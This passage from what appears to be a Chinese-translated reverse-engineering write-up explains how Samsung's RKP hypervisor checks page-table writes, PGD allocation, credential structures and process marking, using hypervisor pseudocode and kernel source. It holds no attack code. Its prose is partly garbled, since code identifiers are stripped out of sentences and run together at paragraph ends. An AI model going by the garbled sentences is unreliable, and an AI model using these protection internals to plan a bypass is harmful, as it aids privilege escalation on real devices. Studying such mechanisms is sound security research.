  // Get the start VA corresponding to the kernel or user page tables.
  start_addr = 0xffffff8000000000;
  if (!is_kernel) {
    start_addr = 0;
  }
  // The new descriptor is valid.
  if (pud_new) {
    // Get the VA mapped by the PUD descriptor.
    addr = start_addr | (pudp_pa << 27) & 0x7fc0000000;
    // The new descriptor is not a table, thus is a block.
    if ((pud_new & 0b11) != 0b11) {
      // Mapping a block is not allowed, trigger a policy violation.
      rkp_policy_violation("l1_pgt write cannot handle blocks - for new entry, %lx", pud_new);
    }
    // The new descriptor is a table, call `rkp_l2pgt_process_table` to process the new PMD.
    res = rkp_l2pgt_process_table(pud_new & 0xfffffffff000, addr, 1 /* alloc */);
    // For user PUD, set the PXN bit of the PUD descriptor.
    if (!is_kernel) {
      set_pxn_bit_of_desc(&pud_new, 1);
    }
    // ...
  }
  if (res) {
    uh_log('L', "rkp_l1pgt.c", 316, "L1 write failed, %lx, %lx", pudp_pa, pud_new);
    return rkp_phys_map_unlock(pudp_pa);
  }
  // Finally, perform the write of the PUD descriptor on behalf of the kernel.
  set_entry_of_pgt(pudp_pa, pud_new);
  return rkp_phys_map_unlock(pudp_pa);
}

第二级¶

rkp_l2pgt_write处理对二级表（或 PMD）的写入。它首先确保 PMD 在 physmap 中被标记为。然后，它使用 check_single_l2e 函数处理旧描述符值和新描述符值。如果旧描述符或新描述符映射受保护的内存，则不允许写入。最后，如果两个检查都通过，则写入新的描述符值。L2

uint8_t* rkp_l2pgt_write(int64_t pmdp, int64_t pmd_new) {
  // ...  // Convert the PMD descriptor PA into a VA.
  pmdp_pa = rkp_get_pa(pmdp);
  // Get the old/current value of the PMD descriptor.
  pmd_old = *pmdp_pa;
  rkp_phys_map_lock(pmdp_pa);
  // Ensure the PMD is marked as such in the physmap.
  if (!is_phys_map_l2(pmdp_pa)) {
    // If RKP is deferred initialized, continue with the processing.
    if (rkp_deferred_inited) {
      uh_log('D', "rkp_l2pgt.c", 236, "l2 is not marked as L2 Type in Physmap, trying to fix it, %lx", pmdp_pa);
    }
    // Otherwise, perform the write.
    else {
      set_entry_of_pgt(pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
  }
  is_flag3 = is_phys_map_flag3(pmdp_pa);
  // Check if this is a kernel or user PMD using the physmap.
  is_kernel = is_phys_map_kernel(pmdp_pa);
  // Get the start VA corresponding to the kernel or user page tables.
  start_addr = 0xffffff8000000000;
  if (!is_kernel) {
    start_addr = 0;
  }
  // Get the VA mapped by the PMD descriptor.
  addr = (pmdp_pa << 18) & 0x3fe00000 | ((is_flag3 & 0x1ff) << 30) | start_addr;
  // If the old descriptor was valid.
  if (pmd_old) {
    // Call `check_single_l2e` to check the next level.
    res = check_single_l2e(pmdp_pa, addr, 0 /* free */);
    // If the old descriptor maps protected memory, do not perform the write.
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 254, "Failed in freeing entries under the l2e %lx %lx", pmdp_pa, pmd_new);
      uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
  }
  // If the new descriptor is valid.
  if (pmd_new) {
    // Call `check_single_l2e` to check the next level.
    res = check_single_l2e(&pmd_new, addr, 1 /* alloc */);
    // If the new descriptor maps protected memory, do not perform the write.
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
    // ...
  }
  // Finally, perform the write of the PMD descriptor on behalf of the kernel.
  set_entry_of_pgt(pmdp_pa, pmd_new);
  return rkp_phys_map_unlock(pmdp_pa);
}

第三级¶

rkp_l3pgt_write处理对第三级表（或 PT）的写入。如果描述符将虚拟内存映射到内核文本部分之前，则存在一种特殊情况，在这种情况下，将设置其 PXN 位并执行写入。否则，如果 PT 映射为 physmap 中的 presmap，并且新描述符不是页面描述符，或者设置了其 PXN 位，或者 RKP 未延迟初始化，则允许写入。L3FREE

int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
  // ...  // Convert the PT descriptor PA into a VA.
  ptep_pa = rkp_get_pa(ptep);
  rkp_phys_map_lock(ptep_pa);
  // If the PT is marked as such in the physmap, or as `FREE`.
  if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
    // If the new descriptor is not a page descriptor, or its PXN bit is set, the check passes.
    if ((pte_val & 0b11) != 0b11 || get_pxn_bit_of_desc(pte_val, 3)) {
      allowed = 1;
    }
    // Otherwise, the check fails if RKP is deferred initialized.
    else {
      allowed = rkp_deferred_inited == 0;
    }
  }
  // If the PT is marked as something else, the check also fails.
  else {
    allowed = 0;
  }
  rkp_phys_map_unlock(ptep_pa);
  cs_enter(&l3pgt_lock);
  // In the special case where the descriptor is in the same page as the descriptor that maps the start of the kernel
  // text section and maps memory that is before the start of the kernel text section.
  if (stext_ptep && ptep_pa < stext_ptep && (ptep_pa ^ stext_ptep) <= 0xfff) {
    // Set the PXN bit of the new descriptor value.
    if (pte_val) {
      pte_val |= (1 << 53);
    }
    cs_exit(&l3pgt_lock);
    // And perform the write on behalf of the kernel.
    return set_entry_of_pgt(ptep_pa, pte_val);
  }
  cs_exit(&l3pgt_lock);
  // If the check failed, trigger a policy violation.
  if (!allowed) {
    pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
    return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
  }
  // Otherwise, perform the write of the PT descriptor on behalf of the kernel.
  return set_entry_of_pgt(ptep_pa, pte_val);
}

分配和释放 PGD¶

除了修改 PUD、PMD 和 PT 中包含的描述符外，内核还需要分配（有时是免费的）PGD。

在内核方面，PGD 的分配由 pgd_alloc 函数完成。它调用 rkp_ro_alloc 从虚拟机管理程序获取只读页面，然后调用命令通知 RKP 此页面将是 PGD。RKP_NEW_PGD

▸ arch/arm64/mm/pgd.c

pgd_t *pgd_alloc(struct mm_struct *mm)
{
    // ...
    pgd_t *ret = NULL;    ret = (pgd_t *) rkp_ro_alloc();
    if (!ret) {
        if (PGD_SIZE == PAGE_SIZE)
            ret = (pgd_t *)__get_free_page(PGALLOC_GFP);
        else
            ret = kmem_cache_alloc(pgd_cache, PGALLOC_GFP);
    }
    if(unlikely(!ret)) {
        pr_warn("%s: pgd alloc is failed\n", __func__);
        return ret;
    }
    uh_call(UH_APP_RKP, RKP_NEW_PGD, (u64)ret, 0, 0, 0);
    return ret;
    // ...
}

PGD 的释放由 pgd_free 函数完成。它调用命令通知 RKP 此页面将不再是 PGD，然后调用 rkp_ro_free 将页面交给虚拟机管理程序。RKP_FREE_PGD

▸ arch/arm64/mm/pgd.c

void pgd_free(struct mm_struct *mm, pgd_t *pgd)
{
    // ...
    uh_call(UH_APP_RKP, RKP_FREE_PGD, (u64)pgd, 0, 0, 0);    /* if pgd memory come from read only buffer, the put it back */
    /*TODO: use a macro*/
    if (is_rkp_ro_page((u64)pgd))
        rkp_ro_free((void *)pgd);
    else {
        if (PGD_SIZE == PAGE_SIZE)
            free_page((unsigned long)pgd);
        else
            kmem_cache_free(pgd_cache, pgd);
    }
    // ...
}

在虚拟机监控程序端，该函数在递增计数器后最终调用 rkp_l1pgt_new_pgd。此函数不允许分配、或。如果初始化了 RKP，它将调用 rkp_l1pgt_process_table 来处理新的 PGD（假定为用户 PGD）。rkp_cmd_new_pgdswapper_pg_diridmap_pg_dirtramp_pg_dir

void rkp_l1pgt_new_pgd(saved_regs_t* regs) {
  // ...  // Convert the PGD VA into a PA.
  pgdp = rkp_get_pa(regs->x2) & 0xfffffffffffff000;
  // The allocated PGD can't be `swapper_pg_dir`, `idmap_pg_dir` or `tramp_pg_dir`, or we trigger a policy violation.
  if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || TRAMP_PGD && pgdp == TRAMP_PGD) {
    rkp_policy_violation("PGD new value not allowed, pgdp : %lx", pgdp);
  }
  // If RKP is initialized, process the new PGD by calling `rkp_l1pgt_process_table`. If not, do nothing.
  else if (rkp_inited) {
    if (rkp_l1pgt_process_table(pgdp, 0 /* user */, 1 /* alloc */) < 0) {
      uh_log('L', "rkp_l1pgt.c", 383, "l1pgt processing is failed, pgdp : %lx", pgdp);
    }
  }
}

该函数最终在递增计数器后调用 rkp_l1pgt_free_pgd。此函数不允许释放、或。如果初始化了 RKP，它会调用 rkp_l1pgt_process_table 来处理旧的 PGD，除非它是当前处于活动状态的用户或内核 PGD，在这种情况下，会引发错误并且虚拟机管理程序会崩溃。rkp_cmd_free_pgdswapper_pg_diridmap_pg_dirtramp_pg_dir

void rkp_l1pgt_free_pgd(saved_regs_t* regs) {
  // ...  // Convert the PGD VA into a PA.
  pgd_pa = rkp_get_pa(regs->x2);
  pgdp = pgd_pa & 0xfffffffffffff000;
  // The freed PGD can't be `swapper_pg_dir`, `idmap_pg_dir` or `tramp_pg_dir`, or we trigger a policy violation.
  if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || (TRAMP_PGD && pgdp == TRAMP_PGD)) {
    uh_log('E', "rkp_l1pgt.c", 345, "PGD free value not allowed, pgdp=%lx k_pgd=%lx k_id_pgd=%lx", pgdp, INIT_MM_PGD,
           ID_MAP_PGD);
    rkp_policy_violation("PGD free value not allowed, pgdp=%p k_pgd=%p k_id_pgd=%p", pgdp, INIT_MM_PGD, ID_MAP_PGD);
  }
  // If RKP is initialized, process the old PGD by calling `rkp_l1pgt_process_table`. If not, do nothing.
  else if (rkp_inited) {
    // Unless this is the active user or kernel PGD (retrieved by checking the system register TTBRn_EL1 value).
    if ((get_ttbr0_el1() & 0xffffffffffff) == (pgd_pa & 0xfffffffff000) ||
        (get_ttbr1_el1() & 0xffffffffffff) == (pgd_pa & 0xfffffffff000)) {
      uh_log('E', "rkp_l1pgt.c", 354, "PGD free value not allowed, pgdp=%lx ttbr0_el1=%lx ttbr1_el1=%lx", pgdp,
             get_ttbr0_el1(), get_ttbr1_el1());
    }
    if (rkp_l1pgt_process_table(pgdp, 0 /* user */, 0 /* free */) < 0) {
      uh_log('L', "rkp_l1pgt.c", 363, "l1pgt processing is failed, pgdp : %lx", pgdp);
    }
  }
}

凭据保护¶

内核结构¶

在“保护内核数据”部分中，我们看到和结构现在被分配在虚拟机管理程序提供的只读页面上。因此，内核不能再直接修改它们。此外，出于数据流完整性 （DFI）目的，还会向这些结构添加新字段。特别是，每个结构现在都有一个“back-pointer”，即指向所属结构的指针：credtask_security_struct

用于结构;task_structcred
的结构。credtask_security_struct

该结构还获得指向所属任务的 PGD 的反向指针，以及一个“使用计数器”，该计数器可防止重用另一个任务的结构（特别是，可能会尝试重用任务凭据）。credcredtask_structinit

▸ include/linux/cred.h

struct cred {
    // ...
    atomic_t *use_cnt;
    struct task_struct *bp_task;
    void *bp_pgd;
    unsigned long long type;
} __randomize_layout;

▸ security/selinux/include/objsec.h

struct task_security_struct {
    // ...
    void *bp_cred;
};

当通过调用 security_integrity_current 执行 SELinux 钩子时，会验证这些反向指针和值。在我们的研究设备上，缺少对此函数的调用，因此在本节中，我们将查看具有该函数的其他三星设备的源代码。

内核宏，并包含对 security_integrity_current 的调用。call_void_hookcall_int_hook

▸ security/security.c

#define call_void_hook(FUNC, ...)               \
    do {                            \
        struct security_hook_list *P;           \
                                \
        if(security_integrity_current()) break; \
        list_for_each_entry(P, &security_hook_heads.FUNC, list) \
            P->hook.FUNC(__VA_ARGS__);      \
    } while (0)#define call_int_hook(FUNC, IRC, ...) ({            \
    int RC = IRC;                       \
    do {                            \
        struct security_hook_list *P;           \
                                \
        RC = security_integrity_current();      \
        if (RC != 0)                            \
            break;                              \
        list_for_each_entry(P, &security_hook_heads.FUNC, list) { \
            RC = P->hook.FUNC(__VA_ARGS__);     \
            if (RC != 0)                \
                break;              \
        }                       \
    } while (0);                        \
    RC;                         \
})

security_integrity_current首先调用 rkp_is_valid_cred_sp 来验证凭据和安全结构是否是从受虚拟机监控程序保护的页面分配的。然后，它调用 cmp_sec_integrity 来验证凭据的完整性，并调用 cmp_ns_integrity 来验证装载命名空间的完整性。

▸ security/selinux/hooks.c

int security_integrity_current(void)
{
    rcu_read_lock();
    if ( rkp_cred_enable && 
        (rkp_is_valid_cred_sp((u64)current_cred(),(u64)current_cred()->security)||
        cmp_sec_integrity(current_cred(),current->mm)||
        cmp_ns_integrity())) {
        rkp_print_debug();
        rcu_read_unlock();
        panic("RKP CRED PROTECTION VIOLATION\n");
    }
    rcu_read_unlock();
    return 0;
}

rkp_is_valid_cred_sp可确保凭据和安全结构受到虚拟机监控程序的保护。并形成有效的对。对于其他对，结构的开始和结束必须位于虚拟机管理程序分配的只读页面中。此外，的的反向指针必须是正确的结构。init_credinit_sectask_security_structcred

▸ security/selinux/hooks.c

extern struct cred init_cred;
static inline unsigned int rkp_is_valid_cred_sp(u64 cred,u64 sp)
{
        struct task_security_struct *tsec = (struct task_security_struct *)sp;        if((cred == (u64)&init_cred) && 
            ( sp == (u64)&init_sec)){
            return 0;
        }
        if(!rkp_ro_page(cred)|| !rkp_ro_page(cred+sizeof(struct cred)-1)||
            (!rkp_ro_page(sp)|| !rkp_ro_page(sp+sizeof(struct task_security_struct)-1))) {
            return 1;
        }
        if((u64)tsec->bp_cred != cred) {
            return 1;
        }
        return 0;
}

cmp_sec_integrity检查的的反向指针是否为当前，以及的 PGD 指针和当前内存描述符是否都指向不能是的同一 PGD。credtask_structcredswapper_pg_dir

▸ security/selinux/hooks.c

static inline unsigned int cmp_sec_integrity(const struct cred *cred,struct mm_struct *mm)
{
    return ((cred->bp_task != current) || 
            (mm && (!( in_interrupt() || in_softirq())) && 
            (cred->bp_pgd != swapper_pg_dir) &&
            (mm->pgd != cred->bp_pgd)));    
}

保护初始化¶

为了能够代表内核修改进程的结构并对其字段的值执行验证，虚拟机管理程序需要了解其布局和结构的布局。credtask_struct

在内核方面，执行此操作的函数是kdp_init。它使用 RKP 所需的偏移量以及和全局变量的虚拟地址调用命令。RKP_KDP_X40verifiedbootstatess_initialized

▸ init/main.c

void kdp_init(void)
{
    kdp_init_t cred;    cred.credSize   = sizeof(struct cred);
    cred.sp_size    = rkp_get_task_sec_size();
    cred.pgd_mm     = offsetof(struct mm_struct,pgd);
    cred.uid_cred   = offsetof(struct cred,uid);
    cred.euid_cred  = offsetof(struct cred,euid);
    cred.gid_cred   = offsetof(struct cred,gid);
    cred.egid_cred  = offsetof(struct cred,egid);
    cred.bp_pgd_cred    = offsetof(struct cred,bp_pgd);
    cred.bp_task_cred   = offsetof(struct cred,bp_task);
    cred.type_cred      = offsetof(struct cred,type);
    cred.security_cred  = offsetof(struct cred,security);
    cred.usage_cred     = offsetof(struct cred,use_cnt);
    cred.cred_task      = offsetof(struct task_struct,cred);
    cred.mm_task        = offsetof(struct task_struct,mm);
    cred.pid_task       = offsetof(struct task_struct,pid);
    cred.rp_task        = offsetof(struct task_struct,real_parent);
    cred.comm_task      = offsetof(struct task_struct,comm);
    cred.bp_cred_secptr     = rkp_get_offset_bp_cred();
    cred.verifiedbootstate = (u64)verifiedbootstate;
#ifdef CONFIG_SAMSUNG_PRODUCT_SHIP
    cred.selinux.ss_initialized_va  = (u64)&ss_initialized;
#endif
    uh_call(UH_APP_RKP, RKP_KDP_X40, (u64)&cred, 0, 0, 0);
}

rkp_get_task_sec_size，kdp_init调用的第一个函数只是返回结构的大小。task_security_struct

▸ security/selinux/hooks.c

unsigned int rkp_get_task_sec_size(void)
{
    return sizeof(struct task_security_struct);
}

第二个函数 rkp_get_offset_bp_cred 返回其（指向凭据的指针）字段的偏移量。bp_cred

▸ security/selinux/hooks.c

unsigned int rkp_get_offset_bp_cred(void)
{
    return offsetof(struct task_security_struct,bp_cred);
}

cred_init 函数是从函数调用的。start_kernel

▸ init/main.c

asmlinkage __visible void __init start_kernel(void)
{
    // ...
    cred_init();
    // ...
}

在虚拟机管理程序端，该命令由处理，该命令调用 rkp_cred_init。rkp_cmd_cred_init

rkp_cred_init分配结构，提取内核提供的各种偏移量并对其进行健全性检查，并将它们存储到该结构中。它还存储设备是否已解锁，以及表示是否初始化 SELinux 的变量的物理地址。rkp_cred

void rkp_cred_init(saved_regs_t* regs) {
  // ...  // Allocate the `rkp_cred` structure that will hold all the offsets.
  rkp_cred = malloc(0xf0, 0);
  // Convert the VA of the kernel argument structure to a PA.
  cred = rkp_get_pa(regs->x2);
  // Ensure we're not calling this function multiple times.
  if (cred_inited == 1) {
    uh_log('L', "rkp_kdp.c", 1083, "Cannot initialized for Second Time\n");
    return;
  }
  // Extract the various fields of the kernel-provided structure.
  cred_inited = 1;
  credSize = cred->credSize;
  sp_size = cred->sp_size;
  uid_cred = cred->uid_cred;
  euid_cred = cred->euid_cred;
  gid_cred = cred->gid_cred;
  egid_cred = cred->egid_cred;
  usage_cred = cred->usage_cred;
  bp_pgd_cred = cred->bp_pgd_cred;
  bp_task_cred = cred->bp_task_cred;
  type_cred = cred->type_cred;
  security_cred = cred->security_cred;
  bp_cred_secptr = cred->bp_cred_secptr;
  // Ensure the offsets within a structure are not bigger than the structure total size.
  if (uid_cred > credSize || euid_cred > credSize || gid_cred > credSize || egid_cred > credSize ||
      usage_cred > credSize || bp_pgd_cred > credSize || bp_task_cred > credSize || type_cred > credSize ||
      security_cred > credSize || bp_cred_secptr > sp_size) {
    uh_log('L', "rkp_kdp.c", 1102, "RKP_9a19e9ca");
    return;
  }
  // Store the various fields into the corresponding global variables.
  rkp_cred->CRED_SIZE = cred->credSize;
  rkp_cred->SP_SIZE = sp_size;
  rkp_cred->CRED_UID_OFFSET = uid_cred >> 2;
  rkp_cred->CRED_EUID_OFFSET = euid_cred >> 2;
  rkp_cred->CRED_GID_OFFSET = gid_cred >> 2;
  rkp_cred->CRED_EGID_OFFSET = egid_cred >> 2;
  rkp_cred->TASK_PID_OFFSET = cred->pid_task >> 2;
  rkp_cred->TASK_CRED_OFFSET = cred->cred_task >> 3;
  rkp_cred->TASK_MM_OFFSET = cred->mm_task >> 3;
  rkp_cred->TASK_PARENT_OFFSET = cred->rp_task >> 3;
  rkp_cred->TASK_COMM_OFFSET = cred->comm_task >> 3;
  rkp_cred->CRED_SECURITY_OFFSET = security_cred >> 3;
  rkp_cred->CRED_BP_PGD_OFFSET = bp_pgd_cred >> 3;
  rkp_cred->CRED_BP_TASK_OFFSET = bp_task_cred >> 3;
  rkp_cred->CRED_FLAGS_OFFSET = type_cred >> 3;
  rkp_cred->SEC_BP_CRED_OFFSET = bp_cred_secptr >> 3;
  rkp_cred->MM_PGD_OFFSET = cred->pgd_mm >> 3;
  rkp_cred->CRED_USE_CNT = usage_cred >> 3;
  rkp_cred->VERIFIED_BOOT_STATE = 0;
  // Convert the VB state VA to a PA, and store the device unlock state in a global variable.
  vbs_va = cred->verifiedbootstate;
  if (vbs_va) {
    vbs_pa = check_and_convert_kernel_input(vbs_va);
    if (vbs_pa != 0) {
      rkp_cred->VERIFIED_BOOT_STATE = strcmp(vbs_pa, "orange") == 0;
    }
  }
  rkp_cred->SELINUX = rkp_get_pa(&cred->selinux);
  // For `ss_initialized`, convert the VA to a PA and store it into a global variable.
  rkp_cred->SS_INITIALIZED_VA = rkp_get_pa(cred->selinux.ss_initialized_va);
  uh_log('L', "rkp_kdp.c", 1147, "RKP_4bfa8993 %lx %lx %lx %lx");
}

PGD变化¶

当内核需要设置的 PGD 时，它会调用虚拟机管理程序，虚拟机管理程序也会更新任务结构的反向指针。task_structcred

在内核方面，任务 PGD 的更改可能发生在两个地方。第一个是，它调用命令。exec_mmapRKP_KDP_X43

▸ fs/exec.c

static int exec_mmap(struct mm_struct *mm)
{
    // ...
    if(rkp_cred_enable){
    uh_call(UH_APP_RKP, RKP_KDP_X43,(u64)current_cred(), (u64)mm->pgd, 0, 0);
    }
    // ...
}

第二个是 rkp_assign_pgd 函数，它调用相同的命令。

▸ kernel/fork.c

void rkp_assign_pgd(struct task_struct *p)
{
    u64 pgd;
    pgd = (u64)(p->mm ? p->mm->pgd :swapper_pg_dir);    uh_call(UH_APP_RKP, RKP_KDP_X43, (u64)p->cred, (u64)pgd, 0, 0);
}

rkp_assign_pgd是从调用的，这是复制进程时。copy_process

▸ kernel/fork.c

static __latent_entropy struct task_struct *copy_process(
                    unsigned long clone_flags,
                    unsigned long stack_start,
                    unsigned long stack_size,
                    int __user *child_tidptr,
                    struct pid *pid,
                    int trace,
                    unsigned long tls,
                    int node)
{
  // ...
    if(rkp_cred_enable)
        rkp_assign_pgd(p);
  // ...
}

在虚拟机管理程序端，该命令由处理，它仅调用 rkp_pgd_assign。rkp_cmd_pgd_assign

rkp_pgd_assign调用 rkp_phys_map_verify_cred 以确保内核提供的结构是合法结构，然后再写入结构字段的新值。credbp_pgdcred

void rkp_pgd_assign(saved_regs_t* regs) {
  // ...  // Convert the VA of the cred structure into a PA.
  cred = rkp_get_pa(regs->x2);
  // The new PGD of the task is in register x3.
  pgd = regs->x3;
  // Verify that the credentials are valid and hypervisor-protected.
  if (rkp_phys_map_verify_cred(cred)) {
    uh_log('L', "rkp_kdp.c", 146, "rkp_pgd_assign !!  %lx %lx %lx", cred, regs->x2, pgd);
    return;
  }
  // Update the pgd field of the cred structure if the check passed.
  *(cred + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = pgd;
}

rkp_phys_map_verify_cred验证指针是否与结构大小对齐，并在 physmap 中标记为。credCRED

int64_t rkp_phys_map_verify_cred(uint64_t cred) {
  // ...  // The credentials pointer must not be NULL.
  if (!cred) {
    return 1;
  }
  // It must be aligned on its expected size.
  if (cred != cred / CRED_BUFF_SIZE * CRED_BUFF_SIZE) {
    return 1;
  }
  rkp_phys_map_lock(cred);
  // It must be marked as `CRED` in the physmap.
  if (is_phys_map_cred(cred)) {
    uh_log('L', "rkp_kdp.c", 127, "physmap verification failed !!!!! %lx %lx %lx", cred, cred, cred);
    rkp_phys_map_unlock(cred);
    return 1;
  }
  rkp_phys_map_unlock(cred);
  return 0;
}

安全变更¶

与任务 PGD 中的更改类似，内核也会调用虚拟机管理程序来更改结构的字段。securitycred

在内核方面，当结构被 selinux_cred_free 函数释放时，就是这种情况。它调用命令，但也调用 rkp_free_security 来释放结构。credRKP_KDP_X45task_security_struct

▸ security/selinux/hooks.c

static void selinux_cred_free(struct cred *cred)
{
    // ...
    if (rkp_ro_page((unsigned long)cred)) {
        uh_call(UH_APP_RKP, RKP_KDP_X45, (u64) &cred->security, 7, 0, 0);
    }
    // ...
    rkp_free_security((unsigned long)tsec);
    // ...
}

rkp_free_security首先调用 chk_invalid_kern_ptr 来检查作为参数给出的指针是否为有效的内核指针。如果然后调用 rkp_ro_page 并rkp_from_tsec_jar，以确保它是从受虚拟机监控程序保护的缓存中分配的，然后再调用（或者如果不是）。kmem_cache_freekfree

▸ kernel/cred.c

void rkp_free_security(unsigned long tsec)
{
    if(!tsec || 
        chk_invalid_kern_ptr(tsec))
        return;    if(rkp_ro_page(tsec) && 
        rkp_from_tsec_jar(tsec)){
        kmem_cache_free(tsec_jar,(void *)tsec);
    }
    else { 
        kfree((void *)tsec);
    }
}

chk_invalid_kern_ptr检查指针是否以0xffffffc开头。

▸ kernel/cred.c

int chk_invalid_kern_ptr(u64 tsec) 
{
    return (((u64)tsec >> 36) != (u64)0xFFFFFFC);
}

rkp_ro_page调用 rkp_is_pg_protected，除非要检查的地址是或。init_credinit_sec

▸ include/linux/security.h

static inline u8 rkp_ro_page(unsigned long addr)
{
    if(!rkp_cred_enable)
        return (u8)0;
    if((addr == ((unsigned long)&init_cred)) || 
        (addr == ((unsigned long)&init_sec)))
        return (u8)1;
    else
        return rkp_is_pg_protected(addr);
}

最后，rkp_from_tsec_jar从对象获取头页，然后从板缓存中获取，如果是缓存，则返回。tsec_jar

▸ kernel/cred.c

int rkp_from_tsec_jar(unsigned long addr)
{
    static void *objp;
    static struct kmem_cache *s;
    static struct page *page;    objp = (void *)addr;
    if(!objp)
        return 0;
    page = virt_to_head_page(objp);
    s = page->slab_cache;
    if(s && s->name) {
        if(!strcmp(s->name,"tsec_jar")) {
            return 1;
        }
    }
    return 0;
}

在虚拟机管理程序端，该命令由处理，该命令调用 rkp_cred_set_security。rkp_cmd_cred_set_security

rkp_cred_set_security从指针获取结构，该指针指向作为参数给出的字段。它确保在将字段设置为毒值之前将其标记为在 physmap 中。credsecurityCREDsecurity

int64_t* rkp_cred_set_security(saved_regs_t* regs) {
  // ...  // Get the beginning of the cred structure from the pointer to its security field, and convert the VA into a PA.
  cred = rkp_get_pa(regs->x2 - 8 * rkp_cred->CRED_SECURITY_OFFSET);
  // Ensure the cred structure is marked as `CRED` in the physmap.
  if (is_phys_map_cred(cred)) {
    return uh_log('L', "rkp_kdp.c", 146, "invalidate_security: invalid cred !!!!! %lx %lx %lx", regs->x2,
                  regs->x2 - 8 * CRED_SECURITY_OFFSET, CRED_SECURITY_OFFSET);
  }
  // Convert the VA of the security field to a PA.
  security = rkp_get_pa(regs->x2);
  // Set the security field to the poison value 7 (remember that we are freeing the cred structure).
  *security = 7;
  return security;
}

过程标记¶

在深入研究凭据更改之前，我们必须首先解释虚拟机管理程序的进程标记。

在内核端，它发生在系统调用的处理程序中。它将调用该命令，为其提供正在执行的二进制文件的路径，以检测任何冲突。此外，如果当前任务是 root，则使用 CHECK_ROOT_UID 宏进行检查，并且检查 rkp_restrict_fork 函数正在执行的二进制文件的限制失败，则系统调用将立即返回。execveRKP_KDP_X4B

▸ fs/exec.c

SYSCALL_DEFINE3(execve,
        const char __user *, filename,
        const char __user *const __user *, argv,
        const char __user *const __user *, envp)
{
    struct filename *path = getname(filename);
    int error = PTR_ERR(path);    if(IS_ERR(path))
        return error;
    if(rkp_cred_enable){
        uh_call(UH_APP_RKP, RKP_KDP_X4B, (u64)path->name, 0, 0, 0);
    }
    if(CHECK_ROOT_UID(current) && rkp_cred_enable) {
        if(rkp_restrict_fork(path)){
            pr_warn("RKP_KDP Restricted making process. PID = %d(%s) "
                            "PPID = %d(%s)\n",
            current->pid, current->comm,
            current->parent->pid, current->parent->comm);
            putname(path);
            return -EACCES;
        }
    }
    putname(path);
  return do_execve(getname(filename), argv, envp);
}

如果 UID、GID、EUID、EGID、SUID 或 SGID 中的任何一个为零，则返回 CHECK_ROOT_UID 宏。

▸ fs/exec.c

#define CHECK_ROOT_UID(x) (x->cred->uid.val == 0 || x->cred->gid.val == 0 || \
            x->cred->euid.val == 0 || x->cred->egid.val == 0 || \
            x->cred->suid.val == 0 || x->cred->sgid.val == 0)

rkp_restrict_fork 函数忽略和二进制文件。它还会忽略标记为“Linux on Dex”的进程，如 rkp_is_lod 宏所检查的那样。对于标记为“非 root”的进程，由 rkp_is_nonroot 宏检查，凭据将更改为用户凭据（即 UID 和 GID 2000）。/system/bin/patchoat/system/bin/idmap2shell

▸ fs/exec.c

static int rkp_restrict_fork(struct filename *path)
{
    struct cred *shellcred;    if (!strcmp(path->name, "/system/bin/patchoat") ||
        !strcmp(path->name, "/system/bin/idmap2")) {
        return 0;
    }
        /* If the Process is from Linux on Dex, 
        then no need to reduce privilege */
#ifdef CONFIG_LOD_SEC
    if(rkp_is_lod(current)){
            return 0;
        }
#endif
    if(rkp_is_nonroot(current)){
        shellcred = prepare_creds();
        if (!shellcred) {
            return 1;
        }
        shellcred->uid.val = 2000;
        shellcred->gid.val = 2000;
        shellcred->euid.val = 2000;
        shellcred->egid.val = 2000;
        commit_creds(shellcred);
    }
    return 0;
}

rkp_is_nonroot宏检查是否设置了结构字段的位 1。typecred

▸ fs/exec.c

#define rkp_is_nonroot(x) ((x->cred->type)>>1 & 1)

rkp_is_lod宏检查是否设置了结构字段的位 3。typecred

▸ fs/exec.c

#define rkp_is_lod(x) ((x->cred->type)>>3 & 1)

现在，我们将看一下进程标记的虚拟机管理程序端，看看这两个位何时设置。

在虚拟机管理程序端，命令由，它调用 rkp_mark_ppt。execverkp_cmd_mark_ppt

rkp_mark_ppt对电流及其结构进行一些健全性检查，然后更改字段的位：task_structcredtype

它为和设置（位 2）和CRED_FLAG_MARK_PPTadbdapp_process32app_process64;
它设置（位 3）用于CRED_FLAG_LODnst;
它取消设置和的（位 1）。CRED_FLAG_CHILD_PPTidmap2patchoat

void rkp_mark_ppt(saved_regs_t* regs) {
  // ...  // Get the current task_struct in the kernel.
  current_va = rkp_ns_get_current();
  // Convert the current task_struct VA into a PA.
  current_pa = rkp_get_pa(current_va);
  // Get the current cred structure from the current task_struct.
  current_cred = rkp_get_pa(*(current_pa + 8 * rkp_cred->TASK_CRED_OFFSET));
  // Get the binary path given as argument in register x2.
  name_va = regs->x2;
  // Convert the binary path VA into a PA.
  name_pa = rkp_get_pa(name_va);
  // Sanity-check: the values must be non NULL and the current cred must be marked as `CRED` in the physmap.
  if (!current_cred || !name_pa || rkp_phys_map_verify_cred(current_cred)) {
    uh_log('L', "rkp_kdp.c", 551, "rkp_mark_ppt NULL Cred OR filename %lx %lx %lx", current_cred, 0, 0);
  }
  // adbd, app_process32 and app_process64 are marked as `CRED_FLAG_MARK_PPT` (4).
  if (!strcmp(name_pa, "/system/bin/adbd") || !strcmp(name_pa, "/system/bin/app_process32") ||
      !strcmp(name_pa, "/system/bin/app_process64")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_MARK_PPT;
  }
  // nst is marked as `CRED_FLAG_LOD` (8, checked by `rkp_is_lod`).
  if (!strcmp(name_pa, "/system/bin/nst")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_LOD;
  }
  // idmap2 is unmarked as `CRED_FLAG_CHILD_PPT` (2, checked by `rkp_is_nonroot`).
  if (!strcmp(name_pa, "/system/bin/idmap2")) {
